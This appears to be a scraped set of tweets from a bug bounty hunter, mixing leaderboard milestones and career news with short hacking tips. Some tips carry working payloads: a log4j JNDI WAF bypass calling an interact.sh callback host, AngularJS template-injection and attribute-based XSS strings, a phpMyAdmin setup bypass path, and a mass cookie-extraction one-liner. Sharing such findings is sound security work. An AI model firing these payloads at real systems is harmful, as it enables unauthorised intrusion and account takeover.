The team at
@OpenAI
just fixed a critical account takeover vulnerability I reported few hours ago affecting
#ChatGPT
.
It was possible to takeover someone's account, view their chat history, and access their billing information without them ever realizing it.
Breakdown below 👇
Today I start a $50,000 bounties in 50 days
#BugBounty
challenge, I’ve been super unproductive lately with an average of 2 hacking hours a week.
Will update the thread occasionally with my progress - everyone welcome to follow aboard and excited to be back at it.
Excited to announce that I just hit the $1,000,000 mark in bounties earned on
@Hacker0x01
!
It's been an incredible journey traveling around the world to compete and collaborate with the best.
Grateful for the opportunity and excited to see what the future holds!
#BugBounty
Ever find a phpMyAdmin login portal and default creds wont work?
Try to access the /phpmyadmin/setup/ endpoint and you might be presented with authentication bypassed configurable admin panel.
This got me a nice bounty on
@Synack
.
Ref:
#bugbountytips
When fuzzing for SQLI always try "%22" as an injection payload, just stumbled upon MariaDB fork that wouldn't show any verbose SQL errors otherwise.
' => 301
" => 301
=> 301 with SQL error
#bugbountytips
How to effectively study and get better doing
#BugBounty
A. Create a private Github Repository
B. Start a clean
C. Keep up with Hacktivity / Twitter / Youtube
D. Write notes (Without copy-pasting)
I'm doing it for over 2 years and the ROI is amazing.
The damage of VDP programs and their Incentivization is far greater than giving some hunters "points" for farming none-bugs that they can later boast on their CV's, I believe it might actually ruin Bug Bounty platforms in the near future, Let's explore the facts 📜
So VDP's, as
We have successfully managed to replicate and confirm the public PoC for CVE-2022-40684. which grants SSH access without any interaction to vulnerable FortiOS instances, with CVSS score of 9.6.
Nuclei template for scanning can be found here:
#BugBounty
Working AWS/Cloudfront
#log4j
WAF Bypass within the URI path
http:\/\/hostname.com/${jndi${nagli:-:}ldap:${::-/}/${hostName}.anything.interact.sh/a}}
Please note that AWS WAF is self configurable, but I got hits on ~100 websites today with this payload.
#BugBounty
Poisoning your Cache for 1000$ - Approach to Exploitation
New Blog Post about recent Web Cache Poisoning bug I have found on a Private Bug Bounty Program
Going over the approach, exploitation and writing reproducible report.
#bugbountytips
#BugBounty
Decided to create "BountyTricks" a repo with private modules and bounty related tricks I'll add from time to time, starting with fresh nuclei SSRF module which takes endpoints as input and check's if they are vulnerable to SSRF - in scale
#bugbountytips
Just got awarded the prestigious P1 Warrior Belt by
@Bugcrowd
for submitting over 100 valid critical submissions to companies on their platform, manually and using automation engine.
Among the companies that I worked with to remediate critical,
AI helps greatly translating JavaScript to "Human Readable Language", here's how I found a very straight forward DOM Based XSS in 2 minutes.
#BugBounty
There are more than 17k publicly accessible Metabase instances on shodan and few BB programs that were affected as well, the fix is super easy for
CVE-2021-41277 and the impact is CRITICAL, so I'd advise patching quickly : )
#bugbounty
Curious about how a $20,000 OAuth bug I discovered at a Live Hacking Event last year looks like? Today you can dive into an exact replica and see for yourself!
I've collaborated with
@NahamSec
&
@hackinghub_io
to create walkthrough video + demo lab 🧪
Enjoying a champagne at Grand Hyatt 🇭🇰 lounge and getting collaboration invite from
@fransrosen
on Sunday?
That’s what dreams are made of 😅
Looking forward to catching up with folks next week in Poland ✈️
#BugBounty
One liner to mass scan for CookieMonster issues
echo "host" | nuclei -t cookie-extractor.yaml | cut -d "=" -f 2 | cut -d ";" -f 1 > cookies && for cookie in $(cat cookies); do ./cookiemonster -cookie $cookie; done
#bugbountytips
Excited to share a small thing I've been working on: fast tooling for detecting misconfigured session implementations in web apps.
CookieMonster rapidly finds misconfigured secret keys in applications using Laravel, Flask, JWTs, and more!
In April, I submitted 173 vulnerabilities to 56 programs on
@Hacker0x01
, also managed to sneak for the first time into the Top 3 global monthly leaderboard 🤙
#BugBounty
Less than 48 hours into
@OpenAI
's
#BugBounty
program on
@Bugcrowd
and already claimed the
#1
spot among 1,000+ researchers by reporting 9 valid vulnerabilities! (so-far)
The program got itself a strong start, and thought I'd share some interesting insights Iv'e noticed:
1/n
The team at
@OpenAI
just fixed a critical account takeover vulnerability I reported few hours ago affecting
#ChatGPT
.
It was possible to takeover someone's account, view their chat history, and access their billing information without them ever realizing it.
Breakdown below 👇
Ever find an endpoint which will let you control the contents inside stored <img src> tag?
As XSS probably won't be possible, you can insert your burp collaborator and look for any referral leakages on the page (via the URI)
Escalated it to 0 interaction ATO.
#bugbountytips
Super excited to have won the Exterminator award for the second time in a row at
@Hacker0x01
's H1-213 Live Hacking Event, while hacking
@amazon
and achieving another Top-5 finish.
Shout-out to
@seanmeals
and
@fransrosen
for the great collaboration and good time!
#BugBounty
Finding postMessage vulnerabilities has never been easier, take a look at our first open-source tool from
@enso_security
which provides GUI and Cross Origin traffic inspector in ease.
Looking forward to see your findings using posta!
#bugbountytips
Cross document messaging is a very common communication method. It has been around for a while,
Watch Enso’s Chief Architect Chen Gour-Arie and Lior Mazor, Information Security at Amdocs discuss cross-document messaging technology, and how to hack it!
Expand your attack surface by grabbing SSL certificates from ip addresses, match these with your Bug Bounty targets.
I'd recommend running this technique on cloud providers such as AWS/Azure/GCP ranges
using
cero [CIDR] (cero 0.0.0.0/0)
#bugbountytips
I've earned more than 5-figure bounties from sensitive links, sent via email, that were leaked without any user interaction. Surprisingly, the leaks came from the very security vendors that were supposed to protect the victims.
Curious how this happens? 👇
#BugBounty
I am thrilled to announce that as of today, I have been ranked among the top 10 hackers on the all-time global leaderboard of
@Hacker0x01
!
2 years since I've scored my first bounty payout.
#BugBounty
I just found a Critical Authentication Bypass on one of my target's Apache Tomcat Instance.
-> redirect (NXDOMAIN)
-> 401 Basic Auth
-> 200 OK
#bugbountytips
The new
@Grafana
CVE-2022-21703, is actually a 1 Click Authentication Bypass and full read SSRF via CSRF, all you need is XSS/TKO on Same site host and the CVSS bumps to 9.3 - Critical.
All
@Grafana
versions are VULNERABLE 🙃
Read more at
#BugBounty
Classic, just got scammed by
@trondao
bug bounty program, they leaked their production () AWS Keys, had access to their secrets, team has fixed in an hour and marked Informative - saying there is no risk.
Found posting feature on a fairly new subdomain, runs AngualrJS 1.7.9
{{ 7 * 7 }} -> 49
{{constructor.constructor('alert(1)')()}} -> Stored XSS
Neither html payloads or normal XSS payloads worked, whenever you find AngularJS instance test for possible CSTI's.
#bugbountytips
Excited to finish this year as the 5th hacker in the world for 2021 at
@Hacker0x01
!
huge achievement for me which involved consistent grind along hard work, and one that I will cherish for long time.
#BugBounty
Following
@zseano
talk on
#NahamCon2021
I have decided to share my already crafted research on the entire Google TLD domains scraped from OSINT sources, everything on the trello board is in GoogleVRP scope.
Go crash it!
#BugBountyTips
#BugBounty
Happy to share my latest writeup about a Critical Issue I have found on *.samsung.com 👻
Broken Access Control leads to Mass Account Takeover of Samsung employees application accounts
#bugbountytips
#bugbounty
My
#BugBounty2021Goals
are:
- 20k$ in bounties
- 3000 reputation on H1
- Attending a LHE/CON abroad
- 1 Valid submission on Facebook and Twitter.
- Tools and framework development for automation
#BugBounty
None-Intrusive
@pdnuclei
template for the Confluence RCE vulnerability CVE-2022-26134 is available
Confirmation of hits by DNS callbacks with nslookup to interactsh servers.
Happy to share some exciting news as I've decided to leave my role at
@salesforce
in order to pursue with my own Application Security B2B Startup
@shockwave_sec
which will wrap up my own automation from the last couple of years into a product offering.
Setup is ready for
@Bugcrowd
's
#BugBash
events and I'm already few P1's in 🤙, I'll be in Vegas from the 6th to the 15th for some on-site hacking and collaborations, chilling, poker and hanging out with friends - looking forward to it!
🌴💻
Had some fun the last couple of hours🧙🏻♂️
19:01 GMT + 2 - New Scope Added
20:05 GMT + 2 - 4th Critical Submitted
20:07 GMT + 2 - New Scope is Out of Scope
00:20 GMT + 2 - $8,000 Bounties
#BugBounty
When you find input field which allows " (quotes), try this payload:
"autofocus onfocus=alert(1)// -> Doesn't work
"type%3d"text"autofocus%20onfocus%3d"alert(1)" -> Works
#bugbountytips
#BugBounty
Excited to finally cross the 40,000 reputation points mark on
@HackerOne
with 2x $5,000 bounties for RCE's, this time it was directly streamlined from , grateful to see the hard work paying off!
#BugBounty
It’s been a blast participating at
@Meta
’s Live Hacking Event, super hardened target but happy to score $17,000 with a pretty cool 0-day in collaboration with
@spaceraccoonsec
@0xteknogeek
- Seoul 🇰🇷 is awesome and looking forward to the next challenges!
#BugBounty
I earned $800 for my submission on
@bugcrowd
#ItTakesACrowd
Stored XSS through 3rd party vendor, soon i'll be releasing my first research paper and slides talk about attacking 3rd parties to score bounties, stay tuned :-)
#BugBounty
Touched down at Denver few hours ago after 20 hours trip for
#h1303
which is my first
@Hacker0x01
In-Person Live Hacking Event.
I’ll share the experiences, stuff I’m up to until monday in this long twitter thread, It’s going to be a 🚀
#BugBounty
Decided to drop the new Freshdesk Subdomain TKO PoC.
We can takeover any expired Freshdesk subdomain by performing response manipulation on the admin portal, as the CNAME validation is being handled only on the client side.
#bugbounty
#bugbountytips
Excited to score a Top 5 finish on H1-3493 🙌🏻
Without many expectations this turned out to be my best performance on
@Hacker0x01
Live Hacking Event!
Thankful for anyone who took part in an this awesome experience
#BugBounty
There is lately huge "blind following" to a certain BB personal, it will lead beginners to a wrong path when they opt to start doing Bug Bounties.
I made the same mistakes and luckily I surrounded myself with great list of BB hunters, I'll create a nice thread of genuine people.
Celebrating my 25th birthday today reflecting on what has been a fantastic week in Dubai for
@GISECGlobal
- It’s always great to meet and hang out with awesome hackers and friends around the world 🫡
#BugBounty
Recently, I faced numerous challenges where I needed to bypass limited SSRF or overcome regex mitigations to increase impact and make a case for a report.
Spinning up a server to host a redirection header is time consuming and not-so-fun to do.
There's an easy alternative 🧵
Happy to sneak into the Top 10 on the 90 days leaderboard at
@Hacker0x01
, 0 VDP reputation involved - result of hard work and many invested hours.
Today marks exactly 11 month since my first bounty.
#BugBounty
The Polyfill[.]io backdoor is wild! from what I read all over on Twitter the person who was in charge of the domain sold it to rogue actors back in February and ever since it served as backdoor to hundreds of thousands major websites that had it referenced within a script tag,
Thanks for tuning in my
@defcon
session and sorry for any possible sound issues.
You can find the talk here:
Sap NetWeaver Open Redirect:
Slides are on the first comment.
You can reach out to me for Q&A about the session :)
Thanks
@SynackRedTeam
for a great event today at Vegas, was great to meet good pals in person and chat around 👋
Looking forward for
@defcon
tomorrow
#BugBounty
Expanding your attack surface with hardcoded APK endpoints sounds like a tough task, but it's simple and rewarding:
1. Install by
@delphit33
2. Download the target's APK with simple Google search
3. apkurlgrep -a target.apk
Win.
#bugbountytips
#BugBounty
Just scooped a very nice bounty and big kudos to
@elastic
’s Bug Bounty Team👌🏻
Submission => Triage => Fix => Bounty in 4 days, definitely a program I’d recommend playing with at
@Hacker0x01
#BugBounty
I have a theory that the amount of people who actually hack full time on a specific public program is < 10 - meaning that there should be ton of bugs out there to find.
I’m 100% certain that if anyone would focus on one for 30 days he would get a valid bug.
#bugbountytips
The new
@Hacker0x01
policy around CVE reports is concerning, especially for High & Critical ones, as it potentially keeps hundreds of their customers vulnerable to critical ransomware-leading risks by withholding information as they are automatically being set as "Informative."
#1
Secret for for being a good
#BugBounty
hunter create a community of like-minded people to share your progress with.
Since June 2021 Iv'e been engaging few hours on daily basis with ~50 top tier hackers and we all learn everyday, make fun together and earn WAY more bounties.
Some VPS's advice for new hackers
You will be fine working on single targets with 5$ DO boxes,
If you want to up your automation game, you'll figure when is the right time to upgrade.
There is 0 logic renting shared instances or starting out with stronger setup.
#bugbountytips
Thrilled to scoop another Top 5 finish on
@Hacker0x01
’s H1-813 Live Hacking Event in Tokyo 🇯🇵 targeting
@PayPal
, earning more than $30,000 in bounties!
#BugBounty
This is a small example of how I like to structure my private repo:
I have already over 30+ chapters and 20k+ lines, that is the best way I found to consume knowledge and build a private hand-book for bug bounty sessions.
Excited to invite you all to join my
@defcon
session airing at on 11:00 AM GMT -8.
We'll go over some reconnaissance concepts, how to scan for bugs at scale and some practical PoC's with new nuclei templates release.
#defcon29
#BugBounty
Team Israel 🇮🇱 finished 2nd on
@Hacker0x01
’s 2023 Ambassador World-cup beating 🇮🇳🇺🇸🇹🇷🇸🇬🇫🇷 along the way!
Circumstances were tough but we gave a proper fight - kudos to the team for all the hard work, looking forward to the next one and for better times ahead 🙏
#BugBounty